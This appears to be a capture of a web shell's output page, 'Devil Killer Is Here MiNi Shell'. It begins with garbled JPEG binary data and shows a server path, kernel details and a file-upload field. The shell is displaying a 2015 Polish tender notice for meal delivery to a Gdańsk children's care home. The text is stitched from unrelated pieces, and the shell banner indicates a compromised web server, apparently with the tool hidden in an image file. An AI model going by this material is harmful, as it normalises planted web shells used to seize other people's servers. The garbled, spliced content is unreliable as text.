JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/337630-N-2015.html

<p class="kh_header"><b>Gdańsk: Wytwarzanie i dostawa posiłków dla wychowanków Pogotowia Opiekuńczego                w Gdańsku</b><br>
<b>Numer ogłoszenia: 337630 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pogotowie Opiekuńcze im. Karola Olgierda Borchardta , ul. Leczkowa 1a, 80-432 Gdańsk, woj. pomorskie, tel. 0-58 344 59 16, faks 0-58 341-10-42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowieopiekuncze.gda.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pogotowieopiekuncze.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: opieka całkowita dla dzieci i młodzieży.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wytwarzanie i dostawa posiłków dla wychowanków Pogotowia Opiekuńczego                w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług  związanych z wytwarzaniem i dostawą posiłków dla wychowanków Pogotowia Opiekuńczego w Gdańsku zgodnie z warunkami zawartymi w SIWZ, według średniego zapotrzebowania dziennego na posiłki.2. Placówka dysponuje 30 miejscami, w tym przedmiotem zamówienia objęte są 3 Zespoły Opieki Wychowawczej zlokalizowane na dwóch kondygnacjach budynku będącego siedzibą zamawiającego. Łączna liczba wychowanków: do 30 osób, aktualnie  żywionych 12 osób. 3. Z uwagi na charakter interwencyjny placówki- dużą rotacją wychowanków,  liczba osób żywionych nie jest stała. Zapotrzebowanie na ilość posiłków może ulegać zmianie co 	oznacza, że nie stanowi ostatecznego
wymiaru zamówienia i nie może być podstawą 	do zgłaszania roszczeń z tytułu niezrealizowanych (przygotowywanych) posiłków lub 	podstawą wykonania zamówienia. Wykonawcy będzie przysługiwało wynagrodzenie wyłącznie za faktycznie przygotowane i wydane posiłki.4. Zamawiający zastrzega, iż w okresie przerw świątecznych, wakacyjnych liczba posiłków może być zdecydowanie niższa.
5. W Pogotowiu Opiekuńczym występuje dieta ogólna, dostosowana do dzieci  i młodzieży w wieku od 6 do 18 lat. Zamawiający w sytuacjach wyjątkowych, zastrzega  sobie prawo 	do zamówienia diety innej niż ogólna np. lekkostrawna.
6. Przewidywany okres wykonywania zamówienia: 01.01.2016r. do 31.12.2016r. 
7. Zapotrzebowanie na okres od 01.01.2016r. do 31.12.2016r., w systemie nie feryjnym, (365 dni)-przez wszystkie dni tygodnia  wynosi:śniadanie i II śniadanie około 10 950 porcji, obiad porcja obiadowa winna składać się z dwóch dań i podwieczorek około  10 950 porcji, kolacjaokoło 10 950 porcji	.
;8. Zestaw dzienny przypadający na 1 osobę to: śniadanie, drugie śniadanie ( w dni szkolne pon-pt. bułka lub drożdżówka, w weekend  np.(batonik lub owoc) , obiad dwudaniowy (zupa, drugie danie z surówką i sok lub napój lub kompot), podwieczorek(batonik lub owoc  lub deser w formie budyniu lub galaretki ) , oraz kolacja np. ciepłe parówki.9. Łączna wartość energetyczna posiłku o którym mowa w punkcie 8 nie może być niższa niż 2500 kcal.10.  Opis zamówienia:wykonawca będzie przygotowywał, dostarczał i zajmował się dystrybucją gotowych posiłków do aneksów kuchennych 3 Zespołów Opieki Wychowawczej   zlokalizowanych na dwóch kondygnacjach budynku będącego siedzibą zamawiającego;
wykonawca będzie przygotowywał posiłki, zachowując wymogi sanitarno -                 epidemiologiczne w zakresie personelu i warunków produkcji oraz weźmie                   odpowiedzialność za ich przestrzeganie;
wykonawca zapewni należytą jakość usługi, a w szczególności, że wszystkie            dostarczone w gotowej postaci posiłki wykonane będą z produktów naturalnych,       wysokiej jakości i zawsze świeżych posiadających aktualne terminy ważności.           Wyklucza się sporządzanie potraw z proszku oraz gotowych półproduktów. Proces produkcji odbywać się będzie zgodnie z wymogami sanitarnymi, Zasadami           prawidłowego żywienia  i systemem HACCP;posiłki dowożone będą w opakowaniach zbiorczych (termosach lub termo portach ) spełniających wymagania sanitarno-higieniczne;termosy lub termo porty z odpowiednim wyposażeniem do przewozu posiłków zapewnia wykonawca;                             
samochód do przewozu posiłków musi być przystosowany do przewozu żywności    oraz spełniać podstawowe wymagania sanitarno-higieniczne;
w przypadku awarii lub innych nieprzewidzianych zdarzeń wykonawca jest                zobowiązany zapewnić dostawę posiłków zgodnych z wymogami SIWZ z innych         źródeł;w przypadku gdy, nastąpią : aria lub inne nieprzewidziane zdarzenia i wykonawca  nie zapewni posiłków zamawiającemu, zamawiający zamawia posiłki na koszt wykonawcy w dogodnym dla siebie punkcie gastronomicznym po cenie             tam obowiązującej;wykonawca zobowiązuje się do odbioru i utylizacji odpadów pokonsumpcyjnych;zamawiający zapewnia pojemniki na odpady pokonsumpcyjne, które znajdują się w aneksach kuchennych;
wykonawca ponosi pełną odpowiedzialność cywilną i finansową za jakość             dostarczanych posiłków, oraz skutki wynikające z zaniedbań przy ich przygotowaniu   i transporcie, mogące mieć negatywny wpływ na zdrowie żywionych dzieci;
wykonawca pobiera i przechowuje próbki wszystkich produktów i potraw przygotowanych dla zamawiającego zgodnie z rozporządzeniem 	Ministra Zdrowia    z dnia 17.04.2007 r. Dz. U. 2007 nr 80 poz. 545 w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego;zamawiający zastrzega sobie prawo dostępu do kopii protokołów pokontrolnych oraz wszystkich atestów na surowce i sprzęt wykorzystany w procesie produkcji kuchennej oraz transportu.11.   Przygotowanie posiłków:
posiłki zostaną przygotowane i dostarczone zamawiającemu wyłącznym staraniem  i na wyłączny koszt wykonawcy zamówienia;wsad do kotła 1 osobodnia nie może być niższy niż 10,00 zł. netto  po cenach zakupu w miesięcznym okresie rozliczeniowym;
podstawą sporządzenia posiłków będzie jadłospis dekadowy sporządzony przez wykonawcę cyklicznie na okres 10 dni i dostarczany zamawiającemu (pisemnie, faksem lub drogą elektroniczną).i zatwierdzony przez zamawiającego. Opracowany jadłospis na 5 dni przed wprowadzeniem do realizacji, wykonawca musi przedłożyć zamawiającemu celem zatwierdzenia. O ewentualnych zmianach w jadłospisie należy niezwłocznie  powiadomić zamawiającego;jadłospis powinien określać rodzaj posiłku, gramaturę, Posiłki powinny pokrywać  odpowiednie zapotrzebowanie na kalorie i podstawowe składniki odżywcze tj.węglowodany, białka, tłuszcze, witaminy oraz sole mineralne;zestawy produktów zawarte w jadłospisach muszą zawierać zróżnicowane menu z uwzględnieniem sezonowych produktów dostępnych na rynku. W ramach jadłospisu dekadowego zasadnicze produkty potraw składające się na poszczególne posiłki nie mogą się powtarzać częściej niż co 5 dni;dostarczane posiłki muszą być świeże, przygotowane przez wykonawcę wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych z bieżącej produkcji dziennej bez konieczności dodatkowej obróbki technologicznej przed dystrybucją w aneksach  kuchennych zamawiającego;oferent jest zobowiązany do urozmaicenia posiłków z uwzględnieniem tradycji  Świąt Bożego Narodzenia oraz Wielkanocy.
12.  Sposób realizacji usługi:
posiłki powinny zostać przygotowane i dostarczone tak, aby możliwe było ich wydanie 	przez zamawiającego w następujących  obowiązujących godzinach: 
 Śniadanie i II śniadanie o  godz. 6.00; Obiad i Podwieczorek   o godz. 13.00;
 Kolacja	o godz. 17.30.
Nie dopuszczamy dwóch transportów posiłków przy założeniu, że kolacja będzie dowożona razem z obiadem i podwieczorkiem, gdyż posiłki wychowankowie spożywają we wskazanych godzinach.
Posiłki muszą być pakowane  oddzielnie dla każdego Zespołu Opieki Wychowawczej
ZOW I  około  10 podopiecznych;ZOW II około 10 podopiecznych;ZOW III około 10 podopiecznych;dostawy będą realizowane na podstawie codziennych zamówień dokonywanych z jednodniowym wyprzedzeniem przez zamawiającego drogą telefoniczną, faksową lub e-mailem , określających	każdorazowo ilość posiłków do godziny 1000  następnego dnia po złożeniu zamówienia;z uwagi na funkcję interwencyjną placówki w przypadku nagłego przyjęcia podopiecznego zamawiający zastrzega sobie prawo do do prowiantowania w danym dniu drogą telefoniczną, faksową lub e-mailem do godziny 15.00 (domawiane posiłki mogą obejmować obiad, podwieczorek i kolację); dostawa posiłków odbywać się będzie do  placówki zamawiającego z dystrybucją  do aneksów  kuchennych 3 Zespołów Opieki Wychowawczej zlokalizowanych na  dwóch kondygnacjach:
I piętro 	znajdują się  2 Zespoły Opieki Wychowawczej tj. ZOW I, ZOW II;
II piętro	znajduje się    1 Zespół Opieki Wychowawczej tj. ZOW III;
mycie oraz dezynfekcja termosów lub termo portów należeć będzie do wykonawcy;
zamawiający zastrzega sobie prawo do oceny i weryfikacji wszystkich parametrów
wykonania zleconej usługi na każdym etapie oraz w każdej chwili i produkcji 
dystrybucji posiłków;organizacja wydawania i konsumpcji dostarczanych do aneksów kuchennych posiłków należy do zamawiającego;rozliczenie między zamawiającym i wykonawcą odbywać się będzie na podstawie faktycznie wydanych posiłków w miesięcznym okresie rozliczeniowym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający nie wyznacza wymagań szczegółowych w tym zakresie. Ocena spełnienia tego warunku nastąpi na podstawie złożonego zał. nr 2 do SIWZ;
Ocena spełnienia tego warunku odbędzie się wg kryterium  spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeśli wykonawca potwierdzi, że wykonał   w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia działalności jest krótszy - w tym okresie, co najmniej jeden podobny 	przedmiot zamówienia. Ocena spełnienia tego warunku nastąpi na podstawie 	złożonego zał. nr 2 do SIWZ;Wykonawca świadczył usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj. wykonywał co najmniej 1usługę polegającą na przygotowaniu i dostarczeniu posiłków do podmiotu zewnętrznego przez okres co najmniej 1 roku dla minimum 40 osób określony jako załącznik nr 4 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeśli wykonawca wykaże się                        posiadaniem minimum 1 środka transportu (samochodu) przeznaczonego  do przewozu przygotowanych posiłków zgodnie z obowiązującymi przepisami   o  dopuszczeniu pojazdu do przewozu żywności przez Państwowego Inspektora                 Sanitarnego.  Ocena spełnienia tego warunku nastąpi na podstawie złożonego zał. nr 2 do SIWZ;wykaz sprzętu z oświadczeniem wykonawcy, że dysponuje lub będzie dysponował sprzętem (pojazdem, termosami lub termo portami) niezbędnym do prawidłowego 	wykonania zamówienia - załącznik nr 5 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeśli wykonawca wykaże się,                          że dysponuje osobą, która posiada wykształcenie dietetyka. Ocena spełnienia tego       warunku nastąpi na podstawie złożonego zał. nr 2 do SIWZ;
Oświadczenie wykonawcy, że dysponuje osobą, która posiada wykształcenie 		dietetyka-załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza wymagań szczegółowych w tym zakresie. 
Ocena spełnienia tego warunku nastąpi na podstawie złożonego zał. nr 2 do SIWZ;
Ocena spełnienia tego warunku odbędzie się wg kryterium spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Pełnomocnictwo, 
W przypadku, gdy upoważnienie do reprezentowania Wykonawcy osoby, która podpisała ofertę, nie wynika z właściwego wypisu z rejestru sądowego lub wpisu do ewidencji działalności gospodarczej, oferta powinna zawierać również dokument potwierdzający to upoważnienie, np. odpowiednie pełnomocnictwo
Pełnomocnictwo może mieć następujące formy: oryginał lub kopia poświadczona 	notarialnie.
2. Oferta składana przez Spółkę Cywilną
Zamawiający na zasadzie art. 25 ustawy Pzp, żąda przedłożenia w ofercie umowy spółki cywilnej lub innego dokumentu, jako niezbędnego do przeprowadzenia postępowania, wskazującego na sposób reprezentowania spółki. Jeżeli złożenie oferty i podpisanie umowy w sprawie zamówienia publicznego przekracza zakres czynności zwykłych spółki, a z treści umowy spółki lub innego dokumentu, o którym mowa powyżej, nie wynika stosowne umocowanie danego wspólnika lub wspólników, dla ważności oferty wymagane jest jej podpisanie przez wszystkich wspólników albo wspólnika umocowanego w drodze odrębnej uchwały wspólników, stanowiącej załącznik do umowy spółki cywilnej bądź też przez pełnomocnika.
3.  Oferta składana przez konsorcjum
powinna zawierać wskazanie pełnomocnika do reprezentowania członków konsorcjum w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Uwaga! Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zastosowanie mają przepisy § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy określony  załącznikiem nr 1 do SIWZ;
2. Formularz cenowy określony załącznikiem nr 1 do oferty;
3. Podpisany i zaparafowany również wypełniony wzór umowy z formularzem cenowym  określony załącznikiem  nr 8 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej 	umowy w stosunku do treści oferty, na podstawie której dokonano wyboru 		wykonawcy w zakresie:
zmiany wynagrodzenia wykonawcy za wykonanie zamówienia, w przypadku zmiany 	powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ             	na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług VAT, 
zmiany stawki podatkowej VAT nie wymaga wprowadzenia odrębnym aneksem        	do umowy jednak winna być udokumentowana na piśmie;
zmiany terminu wykonania zamówienia w przypadku wystąpienia: - siły wyższej.     	Siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej 	umowy występujące po podpisaniu umowy, a powodujące niemożliwość 	wywiązywania się z umowy w jej obecnym brzemieniu, - innych uzasadnionych 	przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pogotowieopiekuncze.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pogotowie Opiekuńcze w Gdańsku, ul. Konrada Leczkowa 1A, 80-432 Gdańsk w sekretariacie czynnym od poniedziałku do piątku w godz. od 07.00 do 14.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 11:00, miejsce: Pogotowie Opiekuńcze w Gdańsku, ul. Konrada Leczkowa 1A, 80-432 Gdańsk w sekretariacie czynnym od poniedziałku do piątku w godz. od 07.00 do 14.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




